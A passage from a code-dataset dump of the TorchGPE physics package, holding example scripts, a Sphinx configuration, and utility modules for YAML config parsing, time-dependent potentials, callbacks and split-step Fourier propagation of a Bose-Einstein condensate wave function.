cbar = plt.colorbar(im0, ax = ax[1], orientation='vertical', label="$Arg(\\alpha)$", format=ticker.FuncFormatter(pi_tick_formatter), ticks=ticker.MultipleLocator(base=np.pi))
x_left, x_right = ax[1].get_xlim()
y_low, y_high = ax[1].get_ylim()
ax[1].set_aspect(abs((x_right-x_left)/(y_low-y_high)) * 1)
plt.suptitle(datetime.now().strftime("%d %b %Y %H:%M:%S"))
plt.tight_layout()
plt.savefig("cavity_self_organization_real_time.png")
plot_pd(depths, detunings, alphas)
# ! check meshgrid indexing and plotting | 3,487 | Python | .py | 57 | 57.368421 | 186 | 0.680118 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,162 | raman_nath.py | qo-eth_TorchGPE/examples/raman_nath/raman_nath.py | from datetime import datetime
from torchgpe.bec2D import Gas
from torchgpe.bec2D.potentials import Contact, Trap, Lattice
from torchgpe.utils import parse_config
import numpy as np
import torch
import matplotlib.pyplot as plt
from matplotlib import ticker
from scipy.constants import hbar, codata
from tqdm.auto import tqdm
import scipy.constants as spconsts
def plot_bec(a, lat):
fig, ax = plt.subplots(1, 2, figsize=(12, 5))
im0 = ax[0].pcolormesh(a.X.cpu(), a.Y.cpu(), (torch.abs(a.psi)**2).cpu(), vmin=0, shading='auto')
ax[0].set_xlabel(r"$x$")
ax[0].set_ylabel(r"$y$")
plt.colorbar(im0, ax=ax[0], orientation='vertical')
im = ax[1].pcolormesh(a.Kx.cpu(), a.Ky.cpu(), torch.abs(a.psik).cpu(), shading='auto')
ax[1].set_ylim([-30, 30])
ax[1].set_xlim([-30, 30])
ax[1].set_ylabel(r"$k_y$")
ax[1].set_xlabel(r"$k_x$")
    k2 = 2*2*np.pi*(a.adim_length/lat.lam)  # adimensionalized 2k vector
circle1=plt.Circle((k2, 0),2, fill=False, edgecolor='red')
circle2=plt.Circle((-k2, 0),2, fill=False, edgecolor='red')
ax[1].add_patch(circle1)
ax[1].add_patch(circle2)
plt.colorbar(im, ax=ax[1], orientation='vertical')
ax[0].set_aspect("equal")
ax[1].set_aspect("equal")
plt.suptitle(datetime.now().strftime("%d %b %Y %H:%M:%S"))
fig.tight_layout()
plt.savefig("raman_nath.png")
if __name__ == "__main__":
config = parse_config("configuration.yaml")
np.random.seed(config["random_seed"])
torch.manual_seed(config["random_seed"])
contact = Contact()
trap = Trap(**config["potentials"]["trap"])
bec = Gas(**config["gas"], float_dtype=torch.float32, complex_dtype=torch.complex64)
bec.psi = torch.exp(-(bec.X**2 + bec.Y**2)/(2*(config["initial_wavefunction"]["gaussian_sigma"] / bec.adim_length)**2))
bec.ground_state([trap, contact], callbacks=[], **config["propagation"]["imaginary_time"])
    # Apply a 15 us pulse of the optical lattice at a depth of 10 recoil energies
lattice = Lattice(V0 = 10, lam=1e-6)
bec.propagate(final_time=0.000015, time_step=config["propagation"]["real_time"]["time_step"], potentials=[trap, contact, lattice], callbacks=[])
    # Time evolution after the pulse (contact interactions only)
bec.propagate(final_time=0.0014, time_step=config["propagation"]["real_time"]["time_step"], potentials=[contact], callbacks=[])
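    # After the pulse, the momentum distribution develops diffraction peaks at multiples
    # of 2*hbar*k; the red circles drawn by plot_bec mark the first +/-2k orders.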
plot_bec(bec, lattice)
| 2,346 | Python | .py | 48 | 44.708333 | 148 | 0.675557 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,163 | thomas_fermi_profile.py | qo-eth_TorchGPE/examples/thomas_fermi_profile/thomas_fermi_profile.py | from torchgpe.bec2D import Gas
from torchgpe.bec2D.potentials import Contact, Trap
from torchgpe.utils import parse_config
import numpy as np
import torch
import matplotlib.pyplot as plt
from scipy.constants import hbar, physical_constants
from datetime import datetime
a_bohr = physical_constants["Bohr radius"][0]
config = parse_config("configuration.yaml")
np.random.seed(config["random_seed"])
torch.manual_seed(config["random_seed"])
contact = Contact(**config["potentials"]["contact"])
trap = Trap(**config["potentials"]["trap"])
bec = Gas(**config["gas"], float_dtype=torch.float32, complex_dtype=torch.complex64)
bec.psi = torch.exp(-(bec.X**2 + bec.Y**2)/(2*(config["initial_wavefunction"]["gaussian_sigma"] / bec.adim_length)**2))
bec.ground_state([trap, contact], callbacks=[], **config["propagation"]["imaginary_time"])
U0 = np.sqrt(8*np.pi)*config["gas"]["N_particles"]*config["potentials"]["contact"]["a_s"]*a_bohr/config["potentials"]["contact"]["a_orth"]*hbar**2/bec.mass
U0_prime = U0/(hbar*bec.adim_pulse*bec.adim_length**2)
mu_prime = np.sqrt(bec.mass*U0*(2*np.pi)**2*config["potentials"]["trap"]["omegax"]*config["potentials"]["trap"]["omegay"]/np.pi)/(hbar*bec.adim_pulse)
V = 2*(np.pi/bec.adim_pulse)**2*((config["potentials"]["trap"]["omegax"]*bec.X)**2+(config["potentials"]["trap"]["omegay"]*bec.Y)**2)
tf_density = (mu_prime-V)/U0_prime * torch.heaviside(mu_prime-V, torch.zeros_like(bec.X))
fig, ax = plt.subplots(1, 1, figsize=(7,4))
ax.plot(bec.x.cpu(), tf_density[bec.psi.shape[0]//2,:].cpu(), label="Thomas-Fermi", ls="dashed", c="red")
ax.plot(bec.x.cpu(), bec.density[bec.psi.shape[0]//2,:].cpu(), label="GPE")
ax.set_xlabel(r"$x$")
ax.set_ylabel(r"$y$")
plt.legend()
plt.title(datetime.now().strftime("%d %b %Y %H:%M:%S"))
fig.savefig("thomas_fermi_profile.png")
| 1,813 | Python | .py | 30 | 58.9 | 155 | 0.705483 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,164 | conf.py | qo-eth_TorchGPE/docs/source/conf.py | # Configuration file for the Sphinx documentation builder.
#
# For the full list of built-in configuration values, see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Project information -----------------------------------------------------
# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information
import importlib.metadata
__version__ = importlib.metadata.version("torchgpe")
project = 'TorchGPE'
copyright = '2024, Quantum Optics group @ ETH Zurich'
author = 'Quantum Optics group @ ETH Zurich'
release = __version__
# -- General configuration ---------------------------------------------------
# https://www.sphinx-doc.org/en/master/usage/configuration.html#general-configuration
extensions = [
"sphinx.ext.napoleon",
"sphinx.ext.autodoc",
"sphinx.ext.mathjax",
"sphinx_design",
"sphinx.ext.viewcode",
"sphinx_copybutton",
"sphinx.ext.autosummary",
]
templates_path = ['_templates']
exclude_patterns = []
autodoc_typehints = "description"
# -- Options for HTML output -------------------------------------------------
# https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output
html_theme = "pydata_sphinx_theme"
html_static_path = ['_static']
html_css_files = ["style.css"]
html_theme_options = {
"footer_items": ["copyright", "sphinx-and-theme-versions"],
"navbar_end": ["theme-switcher","navbar-icon-links"],
"secondary_sidebar_items": ["page-toc"],
"navbar_persistent": [],
"primary_sidebar_end": [],
"logo": {
"text": "TorchGPE package documentation"
},
"favicons": [
{
"rel": "icon",
"sizes": "32x32",
"href": "https://www.quantumoptics.ethz.ch/favicon.ico",
}
],
"icon_links": [
{
"name": "PyPI",
"url": "https://pypi.org/project/torchgpe",
"icon": "fa-solid fa-box",
},
{
"name": "GitHub",
"url": "https://github.com/qo-eth/TorchGPE",
"icon": "fa-brands fa-github",
}
]
}
html_sidebars = {
"**": ["searchbox.html", "sidebar-nav-bs"]
}
autosummary_generate = True
autodoc_default_flags = ['members', 'undoc-members'] | 2,262 | Python | .py | 65 | 30.123077 | 87 | 0.605769 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,165 | configuration.py | qo-eth_TorchGPE/torchgpe/utils/configuration.py | import warnings
import yaml
from math import sqrt
import re
from scipy.constants import pi, hbar, c
from .potentials import linear_ramp, quench, s_ramp
# The global variables that are available to the !eval tag
__globals = {
# Prevents the user from accessing builtins
'__builtins__': None,
# Allows the user to access the sqrt method from the math module
"sqrt": sqrt,
    # Allows the user to access the linear_ramp, quench, and s_ramp functions from the potentials module
"linear_ramp": linear_ramp,
"s_ramp": s_ramp,
"quench": quench,
# Allows the user to access the pi, hbar, and c constants from the scipy.constants module
"pi": pi,
"hbar": hbar,
"c": c,
}
def __config_tag_evaluate(loader, node):
"""Evaluates a YAML tag of the form !eval <expression> [locals]
Args:
loader (yaml.Loader): The YAML loader.
node (yaml.Node): The YAML node.
"""
expression = loader.construct_scalar(node.value[0])
locals = {} if len(
node.value) == 1 else loader.construct_mapping(node.value[1])
if any(key in locals for key in __globals.keys()):
warnings.warn(
f"{', '.join(__globals.keys())} are reserved keywords and are set to the respective constants. By specifying them, their value is overwritten")
return eval(expression, __globals, locals)
# Regex for parsing exponential numbers
# Taken from https://stackoverflow.com/questions/30458977/how-to-parse-exponential-numbers-with-pyyaml
__config_exponential_resolver =\
re.compile(u'''^(?:
[-+]?(?:[0-9][0-9_]*)\\.[0-9_]*(?:[eE][-+]?[0-9]+)?
|[-+]?(?:[0-9][0-9_]*)(?:[eE][-+]?[0-9]+)
|\\.[0-9_]+(?:[eE][-+][0-9]+)?
|[-+]?[0-9][0-9_]*(?::[0-5]?[0-9])+\\.[0-9_]*
|[-+]?\\.(?:inf|Inf|INF)
|\\.(?:nan|NaN|NAN))$''', re.X)
def parse_config(path):
"""Parses a YAML configuration file.
Args:
path (str): The path to the configuration file.
Returns:
dict: The parsed configuration.
Raises:
yaml.YAMLError: If the configuration file is not valid YAML.
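    Examples:
        A minimal sketch of a configuration using the ``!eval`` tag (the file name and
        keys below are purely illustrative):
        >>> # config.yaml contents:
        >>> #   trap:
        >>> #     omegax: !eval ["2*pi*400"]
        >>> #     omegay: !eval ["sqrt(2)*f", {"f": 100}]
        >>> config = parse_config("config.yaml")  # doctest: +SKIP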
"""
loader = yaml.SafeLoader
loader.add_implicit_resolver(
u'tag:yaml.org,2002:float', __config_exponential_resolver, list(u'-+0123456789.'))
loader.add_constructor('!eval', __config_tag_evaluate)
with open(path, "r") as file:
return yaml.load(file, Loader=loader)
| 2,390 | Python | .py | 59 | 35.40678 | 155 | 0.640449 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,166 | potentials.py | qo-eth_TorchGPE/torchgpe/utils/potentials.py | from abc import ABCMeta, abstractmethod
import torch
# --- Time dependent parameters ---
def time_dependent_variable(var):
"""Transform a variable into a function of time
Args:
var (Union[float, Callable]): The variable to transform. If it is a function, it is returned as is. If it is a constant, it is transformed into a function that returns the constant.
Examples:
>>> time_dependent_variable(1)
lambda _: 1
>>> time_dependent_variable(lambda t: t)
lambda t: t
"""
return var if callable(var) else (lambda _: var)
def any_time_dependent_variable(*vars):
"""Check if any of the variables is time dependent
Args:
*vars (Union[float, Callable]): The variables to check. If any of them is a function, the function returns True. If all of them are constants, the function returns False.
Examples:
>>> any_time_dependent_variable(1, 2, 3)
False
>>> any_time_dependent_variable(1, lambda t: t, 3)
True
"""
return any(map(callable, vars))
# --- Common behaviours in time ---
def linear_ramp(v0=0, t0=0, v1=1, t1=1):
"""Implements a linear ramp from :math:`v_0` to :math:`v_1` between :math:`t_0` and :math:`t_1`. The ramp is constant outside of the interval.
Args:
v0 (float, optional): The initial value of the ramp. Defaults to :math:`0`.
t0 (float, optional): The initial time of the ramp. Defaults to :math:`0`.
v1 (float, optional): The final value of the ramp. Defaults to :math:`1`.
t1 (float, optional): The final time of the ramp. Defaults to :math:`1`.
Returns:
callable: A function that returns the value of the ramp at time :math:`t`
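    Examples:
        Illustrative values; the ramp is clamped to :math:`v_0` before :math:`t_0` and to :math:`v_1` after :math:`t_1`:
        >>> ramp = linear_ramp(v0=0, t0=0, v1=2, t1=4)
        >>> ramp(2)
        1.0
        >>> ramp(10)
        2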
"""
return lambda t: v0 if t < t0 else v0 + (v1-v0)*(t-t0)/(t1-t0) if t < t1 else v1
def s_ramp(v0=0, t0=0, v1=1, t1=1):
"""Implements a smooth ramp from :math:`v_0` to :math:`v_1` between :math:`t_0` and :math:`t_1`. The ramp is constant outside of the interval.
Args:
v0 (float, optional): The initial value of the ramp. Defaults to :math:`0`.
t0 (float, optional): The initial time of the ramp. Defaults to :math:`0`.
v1 (float, optional): The final value of the ramp. Defaults to :math:`1`.
t1 (float, optional): The final time of the ramp. Defaults to :math:`1`.
Returns:
callable: A function that returns the value of the ramp at time :math:`t`
"""
return lambda t: v0 if t < t0 else v0 - 2*(v1-v0)*((t-t0)/(t1-t0))**3 + 3*(v1-v0)*((t-t0)/(t1-t0))**2 if t < t1 else v1
def quench(v0=1, v1=0, quench_time=1):
"""Implements a quench from :math:`v_0` to :math:`v_1` at :math:`t=quench_time`. The value is constant outside of the interval.
Args:
v0 (float, optional): The initial value. Defaults to :math:`1`.
v1 (float, optional): The final value. Defaults to :math:`0`.
quench_time (float, optional): The time at which the quench occurs. Defaults to :math:`1`.
Returns:
        callable: A function that returns the value of the quench at time :math:`t`
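    Examples:
        Illustrative values:
        >>> v = quench(v0=1, v1=0, quench_time=2)
        >>> v(1)
        1
        >>> v(3)
        0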
"""
return lambda t: v0 if t < quench_time else v1
# --- Potential base classes ---
class Potential(metaclass=ABCMeta):
"""Base class for potentials. It is not meant to be used directly, but to be inherited by other classes.
"""
def __init__(self):
#: bool: Whether the potential is time dependent or not
self.is_time_dependent = False
#: gpe.bec2D.gas.Gas: The :class:`~gpe.bec2D.gas.Gas` object to which the potential is applied
self.gas = None
def set_gas(self, gas):
"""Set the :class:`~gpe.bec2D.gas.Gas` object to which the potential is applied
Args:
gas (Gas): The :class:`~gpe.bec2D.gas.Gas` object to which the potential is applied
"""
self.gas = gas
def on_propagation_begin(self):
"""Called at the beginning of the propagation. It is used to post-process the parameters of the potential, once the :class:`~gpe.bec2D.gas.Gas` object has been set."""
pass
class LinearPotential(Potential, metaclass=ABCMeta):
"""Base class for linear 2D potentials. It is not meant to be used directly, but to be inherited by other classes.
"""
def __init__(self):
super().__init__()
@abstractmethod
def get_potential(self, X: torch.tensor, Y: torch.tensor, time: float = None):
"""Return the linear potential evaluated on the grid. If time dependent parameters are present, the parameter ``time`` is also specified, otherwise it is set to ``None``.
Args:
            X (torch.tensor): The X coordinates on the adimensionalized grid on which to compute the potential.
            Y (torch.tensor): The Y coordinates on the adimensionalized grid on which to compute the potential.
time (float, optional): If time dependent parameters are specified, the time at which to evaluate the potential. Defaults to None.
Returns:
torch.tensor: The potential evaluated on the grid.
"""
pass
class NonLinearPotential(Potential, metaclass=ABCMeta):
"""Base class for non-linear 2D potentials. It is not meant to be used directly, but to be inherited by other classes.
"""
def __init__(self):
super().__init__()
@abstractmethod
def potential_function(self, X: torch.tensor, Y: torch.tensor, psi: torch.tensor, time: float = None):
"""Return the non-linear potential evaluated on the grid. If time dependent parameters are present, the parameter ``time`` is also specified, otherwise it is set to ``None``.
Args:
X (torch.tensor): The X coordinates on the adimentionalized grid where to compute the potential.
Y (torch.tensor): The Y coordinates on the adimentionalized grid where to compute the potential.
psi (torch.tensor): The wave function of the gas.
time (float, optional): If time dependent parameters are specified, the time at which to evaluate the potential. Defaults to None.
Returns:
torch.tensor: The potential evaluated on the grid.
"""
pass
| 6,182 | Python | .py | 109 | 49.174312 | 189 | 0.658917 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,167 | plotting.py | qo-eth_TorchGPE/torchgpe/utils/plotting.py | import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1.axes_divider import make_axes_locatable
import numpy as np
def pi_tick_formatter(val, _):
"""Formats a tick value in multiples of pi.
Args:
val (float): The tick value.
_ (int): The tick position.
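    Examples:
        Typically used as a matplotlib tick formatter (sketch; assumes ``ax`` is an existing Axes):
        >>> from matplotlib import ticker
        >>> ax.xaxis.set_major_formatter(ticker.FuncFormatter(pi_tick_formatter))  # doctest: +SKIP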
"""
if val == 0:
return 0
if (val/np.pi*2) % 2 == 0:
return f"${('+' if np.sign(val)==1 else '-') if abs(val/np.pi)==1 else int(val/np.pi)}\\pi$"
return f"${('+' if np.sign(val)==1 else '-') if abs(val/np.pi*2)==1 else int(val/np.pi*2)}\\pi / 2$"
| 565 | Python | .py | 14 | 35.071429 | 104 | 0.597806 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,168 | __init__.py | qo-eth_TorchGPE/torchgpe/utils/__init__.py | import torch
from .configuration import parse_config
import functools
import operator
def ftn(f):
"""Performs an n-dimensional Fourier transform.
Args:
f (torch.Tensor): The function to transform.
"""
return torch.fft.fftshift(torch.fft.fftn(torch.fft.ifftshift(f), norm="ortho"))
def iftn(fk):
"""Performs an n-dimensional inverse Fourier transform.
Args:
fk (torch.Tensor): The function to anti-transform.
"""
return torch.fft.fftshift(torch.fft.ifftn(torch.fft.ifftshift(fk), norm="ortho"))
def normalize_wavefunction(wavefunction, *d):
"""Normalizes a wavefunction.
Args:
wavefunction (torch.Tensor): The wavefunction to normalize.
*d (float): The grid spacing in all the dimensions.
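    Examples:
        Illustrative 1D usage on a uniform grid with spacing ``0.1``:
        >>> psi = normalize_wavefunction(torch.ones(10, dtype=torch.complex128), 0.1)
        >>> float((torch.abs(psi)**2).sum() * 0.1)
        1.0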
"""
return wavefunction / torch.sqrt((torch.abs(wavefunction) ** 2).sum() * functools.reduce(operator.mul, d))
def prompt_yes_no(prompt, default=None):
"""
Prompts the user with a yes/no question until a valid choice is made.
Args:
prompt (str): The prompt to display to the user.
default (bool, optional): The default value to return if the user does not provide a valid input.
Returns:
bool: True if the user responded "y", False if the user responded "n", or the value of the default parameter if specified and the user did not provide a valid input.
"""
while True:
response = input(prompt).strip().lower()
if response == "y":
return True
elif response == "n":
return False
elif default is not None and response == "":
return default
else:
print('Invalid input. Please enter "y" or "n".')
def enumerate_chunk(l, n):
"""Enumerates a list l in chunks of size n.
Args:
l (list): The list to enumerate.
n (int): The size of each chunk.
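    Examples:
        Splitting a three-element list into chunks of two:
        >>> [list(chunk) for chunk in enumerate_chunk(["a", "b", "c"], 2)]
        [[(0, 'a'), (1, 'b')], [(2, 'c')]]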
"""
for i in range(0, len(l), n):
yield zip(range(i, i + n), l[i: i + n])
| 1,974 | Python | .py | 50 | 32.96 | 173 | 0.652311 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,169 | elements.py | qo-eth_TorchGPE/torchgpe/utils/elements.py | import scipy.constants as spconsts
import numpy as np
# A dictionary of elements.
#: dict(str, dict(str, float)): The dictionary of implemented elements. The keys are the element symbols, and the values are dictionaries of properties. The currently implemented elements are ``'87Rb'`` and ``'39K'``, while the available properties are: ``m`` (mass), ``omega d2`` (:math:`d_2` line pulse).
elements_dict = {
"87Rb": {
"m": spconsts.physical_constants["atomic mass constant"][0] * 87,
"omega d2": 2 * np.pi * 384.2304844685e12,
},
"39K": {
"m": spconsts.physical_constants["atomic mass constant"][0] * 39,
"omega d2": 2 * np.pi * 391.01617003e12,
},
}
| 701 | Python | .py | 14 | 45.357143 | 306 | 0.660819 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,170 | callbacks.py | qo-eth_TorchGPE/torchgpe/utils/callbacks.py | import torch
from abc import ABCMeta
class Callback(metaclass=ABCMeta):
"""Base class for callbacks.
Before a simulation starts, it is provided with the instance of the :class:`gpe.bec2D.gas.Gas` (stored in the :py:attr:`gpe.utils.callbacks.Callback.gas` variable) and with a dictionary of parameters for the simulation (stored in :py:attr:`gpe.utils.callbacks.Callback.propagation_params`)
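    Examples:
        A minimal sketch of a custom callback (illustrative only):
        >>> class DensityPeak(Callback):
        ...     def on_epoch_end(self, epoch):
        ...         print(epoch, float(torch.abs(self.gas.psi).max()))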
"""
def __init__(self) -> None:
#: gpe.bec2D.gas.Gas: The instance of the :class:`gpe.bec2D.gas.Gas` class. Populated when the simulation starts.
self.gas = None
#: dict: A dictionary of parameters for the simulation. Populated when the simulation starts.
self.propagation_params = None
def set_gas(self, gas):
self.gas = gas
def set_propagation_params(self, propagation_params):
self.propagation_params = propagation_params
def on_propagation_begin(self):
"""Function called by the :class:`gpe.bec2D.gas.Gas` class before the simulation begins
"""
pass
def on_propagation_end(self):
"""Function called by the :class:`gpe.bec2D.gas.Gas` class after the simulation ends
"""
pass
def on_epoch_begin(self, epoch: int):
"""Function called by the :class:`gpe.bec2D.gas.Gas` at the beginning of each epoch
Args:
epoch (int): The epoch number
"""
pass
def on_epoch_end(self, epoch: int):
"""Function called by the :class:`gpe.bec2D.gas.Gas` at the end of each epoch
Args:
epoch (int): The epoch number
"""
pass
class LInfNorm(Callback):
"""Callback computing the :math:`L_\infty` norm of the wavefunction
The :math:`L_\infty` norm is defined as:
.. math::
L_\infty = \\text{max}_{(x,y)}|\Psi_t - \Psi_{t+\\Delta t}|
Args:
compute_every (int): Optional. The number of epochs after which the norm is computed. Defaults to 1.
print_every (int): Optional. The number of epochs after which, if computed, the norm is also printed. Defaults to 1.
"""
def __init__(self, compute_every=1, print_every=1) -> None:
super().__init__()
#: list: A list of the computed norms
self.norms = []
self.compute_every = compute_every
self.print_every = print_every
def on_epoch_begin(self, epoch: int):
"""At the beginning of an epoch, if its number is a multiple of ``compute_every`` stores the wave function of the gas
Args:
epoch (int): The epoch number
"""
if epoch % self.compute_every != 0:
return
self.psi = self.gas.psi
def on_epoch_end(self, epoch: int):
"""At the end of an epoch, if its number is a multiple of ``compute_every`` uses the stored wave function of the gas to compute
the :math:`L_\infty` norm. If the epoch number is a multiple of ``print_every`` as well, the value of the norm is printed on screen.
Args:
epoch (int): The epoch number
"""
if epoch % self.compute_every != 0:
return
psi = self.gas.psi
self.norms.append(torch.max(torch.abs(psi-self.psi)).cpu())
del self.psi
if epoch % self.print_every == 0:
print(self.norms[-1])
class L1Norm(Callback):
"""Callback computing the :math:`L_1` norm of the wavefunction
The :math:`L_1` norm is defined as:
.. math::
L_1 = \sum_{(x,y)}|\Psi_t - \Psi_{t+\\Delta t}| \, dx \, dy
Args:
compute_every (int): Optional. The number of epochs after which the norm is computed. Defaults to 1.
print_every (int): Optional. The number of epochs after which, if computed, the norm is also printed. Defaults to 1.
"""
def __init__(self, compute_every=1, print_every=1) -> None:
super().__init__()
#: list: A list of the computed norms
self.norms = []
self.compute_every = compute_every
self.print_every = print_every
def on_epoch_begin(self, epoch):
"""At the beginning of an epoch, if its number is a multiple of ``compute_every`` stores the wave function of the gas
Args:
epoch (int): The epoch number
"""
if epoch % self.compute_every != 0:
return
self.psi = self.gas.psi
def on_epoch_end(self, epoch):
"""At the end of an epoch, if its number is a multiple of ``compute_every`` uses the stored wave function of the gas to compute
the :math:`L_1` norm. If the epoch number is a multiple of ``print_every`` as well, the value of the norm is printed on screen.
Args:
epoch (int): The epoch number
"""
if epoch % self.compute_every != 0:
return
psi = self.gas.psi
self.norms.append((torch.sum(torch.abs(psi-self.psi))
* self.gas.dx*self.gas.dy).cpu())
del self.psi
if epoch % self.print_every == 0:
print(self.norms[-1])
class L2Norm(Callback):
"""Callback computing the :math:`L_2` norm of the wavefunction
The :math:`L_2` norm is defined as:
.. math::
L_2 = \sqrt{\sum_{(x,y)}|\Psi_t - \Psi_{t+\\Delta t}|^2 \, dx \, dy}
Args:
compute_every (int): Optional. The number of epochs after which the norm is computed. Defaults to 1.
print_every (int): Optional. The number of epochs after which, if computed, the norm is also printed. Defaults to 1.
"""
def __init__(self, compute_every=1, print_every=1) -> None:
super().__init__()
#: list: A list of the computed norms
self.norms = []
self.compute_every = compute_every
self.print_every = print_every
def on_epoch_begin(self, epoch):
"""At the beginning of an epoch, if its number is a multiple of ``compute_every`` stores the wave function of the gas
Args:
epoch (int): The epoch number
"""
if epoch % self.compute_every != 0:
return
self.psi = self.gas.psi
def on_epoch_end(self, epoch):
"""At the end of an epoch, if its number is a multiple of ``compute_every`` uses the stored wave function of the gas to compute
the :math:`L_2` norm. If the epoch number is a multiple of ``print_every`` as well, the value of the norm is printed on screen.
Args:
epoch (int): The epoch number
"""
if epoch % self.compute_every != 0:
return
psi = self.gas.psi
self.norms.append(torch.sqrt(
torch.sum(torch.abs(psi-self.psi)**2)*self.gas.dx*self.gas.dy).cpu())
del self.psi
if epoch % self.print_every == 0:
print(self.norms[-1])
| 6,819 | Python | .py | 145 | 38.22069 | 293 | 0.615036 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,171 | propagation.py | qo-eth_TorchGPE/torchgpe/utils/propagation.py | from .potentials import LinearPotential, NonLinearPotential
import torch
from tqdm.auto import tqdm, trange
def imaginary_time_propagation(gas, potentials, time_step, N_iterations, callbacks, leave_progress_bar=True):
"""Performs imaginary time propagation of a wave function.
Args:
gas (Gas): The gas whose wave function has to be propagated.
potentials (list): The list of potentials to apply.
time_step (float): The time step to use.
N_iterations (int): The number of iterations to perform.
callbacks (list): The list of callbacks to call at the end of each iteration.
leave_progress_bar (bool, optional): Whether to leave the progress bar after the propagation is complete. Defaults to True.
"""
# Divide the potentials in linear and nonlinear to precompute the linear ones
linear_potentials = [potential for potential in potentials if issubclass(
type(potential), LinearPotential)]
nonlinear_potentials = [potential for potential in potentials if issubclass(
type(potential), NonLinearPotential)]
for callback in callbacks:
callback.on_propagation_begin()
# Precompute kinetic propagator and the total linear potential
kinetic = 0.5 * sum(momentum**2 for momentum in gas.momenta)
kinetic_propagator = torch.exp(-0.5j * kinetic * time_step)
total_linear_potential = sum(potential.get_potential(*gas.coordinates) for potential in linear_potentials)
# Create a progress bar to monitor the evolution
pbar = trange(N_iterations, smoothing=0, desc="Ground state",
bar_format='{l_bar}{bar}| {n_fmt}/{total_fmt} [{elapsed}<{remaining}]', leave=leave_progress_bar)
for epoch in pbar:
for callback in callbacks:
callback.on_epoch_begin(epoch)
# One step of the split-step Fourier method
propagation_step(gas, total_linear_potential, [],
nonlinear_potentials, [], kinetic_propagator, time_step)
for callback in callbacks:
callback.on_epoch_end(epoch)
for callback in callbacks:
callback.on_propagation_end()
def real_time_propagation(gas, potentials, time_step, times, callbacks, leave_progress_bar=True):
"""Performs real time propagation of a wave function.
Args:
gas (Gas): The gas whose wave function has to be propagated.
potentials (list): The list of potentials to apply.
time_step (float): The time step to use.
times (list): The list of times to propagate to.
callbacks (list): The list of callbacks to call at the end of each iteration.
leave_progress_bar (bool, optional): Whether to leave the progress bar after the propagation is complete. Defaults to True.
"""
# Divide the potentials in linear and nonlinear, time dependent and time independent to precompute the static linear ones
static_linear_potentials = [potential for potential in potentials if issubclass(
type(potential), LinearPotential) and not potential.is_time_dependent]
dynamic_linear_potentials = [potential for potential in potentials if issubclass(
type(potential), LinearPotential) and potential.is_time_dependent]
static_nonlinear_potentials = [potential for potential in potentials if issubclass(
type(potential), NonLinearPotential) and not potential.is_time_dependent]
dynamic_nonlinear_potentials = [potential for potential in potentials if issubclass(
type(potential), NonLinearPotential) and potential.is_time_dependent]
for callback in callbacks:
callback.on_propagation_begin()
# Precompute kinetic propagator and the total static linear potential
kinetic = 0.5 * sum(momentum**2 for momentum in gas.momenta)
kinetic_propagator = torch.exp(-0.5j * kinetic * time_step)
total_static_linear_potential = sum(potential.get_potential(*gas.coordinates) for potential in static_linear_potentials)
# Create a progress bar to monitor the evolution
pbar = tqdm(times, smoothing=0, desc="Propagation",
bar_format='{l_bar}{bar}| {n_fmt}/{total_fmt} [{elapsed}<{remaining}]', leave=leave_progress_bar)
for epoch, t in enumerate(pbar):
for callback in callbacks:
callback.on_epoch_begin(epoch)
# One step of the split-step Fourier method
propagation_step(gas, total_static_linear_potential, dynamic_linear_potentials,
static_nonlinear_potentials, dynamic_nonlinear_potentials, kinetic_propagator, time_step, t)
for callback in callbacks:
callback.on_epoch_end(epoch)
for callback in callbacks:
callback.on_propagation_end()
def propagation_step(gas, total_static_linear_potential, dynamic_linear_potentials, static_nonlinear_potentials, dynamic_nonlinear_potentials, kinetic_propagator, time_step, time=None):
"""Performs one step of the split-step Fourier method.
Args:
gas (Gas): The gas whose wave function has to be propagated.
total_static_linear_potential (torch.Tensor): The total static linear potential.
dynamic_linear_potentials (list): The list of dynamic linear potentials.
static_nonlinear_potentials (list): The list of static nonlinear potentials.
dynamic_nonlinear_potentials (list): The list of dynamic nonlinear potentials.
kinetic_propagator (torch.Tensor): The kinetic propagator.
time_step (float): The time step to use.
        time (float, optional): The in-simulation time. Defaults to None.
"""
gas.psik *= kinetic_propagator
gas.psi *= potential_propagator(gas, time_step, total_static_linear_potential,
dynamic_linear_potentials, static_nonlinear_potentials, dynamic_nonlinear_potentials, time)
gas.psik *= kinetic_propagator
def potential_propagator(gas, time_step, total_static_linear_potential, dynamic_linear_potentials, static_nonlinear_potentials, dynamic_nonlinear_potentials, time):
"""Computes the potential propagator.
Args:
gas (Gas): The gas whose wave function has to be propagated.
time_step (float): The time step to use.
total_static_linear_potential (torch.Tensor): The total static linear potential.
dynamic_linear_potentials (list): The list of dynamic linear potentials.
static_nonlinear_potentials (list): The list of static nonlinear potentials.
dynamic_nonlinear_potentials (list): The list of dynamic nonlinear potentials.
time (float): The in-simulation time.
"""
# Compute the static nonlinear potential and both the dynamic ones
total_static_nonlinear_potential = sum(potential.potential_function(
*gas.coordinates, gas.psi) for potential in static_nonlinear_potentials)
total_dynamic_linear_potential = sum(potential.get_potential(
*gas.coordinates, time) for potential in dynamic_linear_potentials)
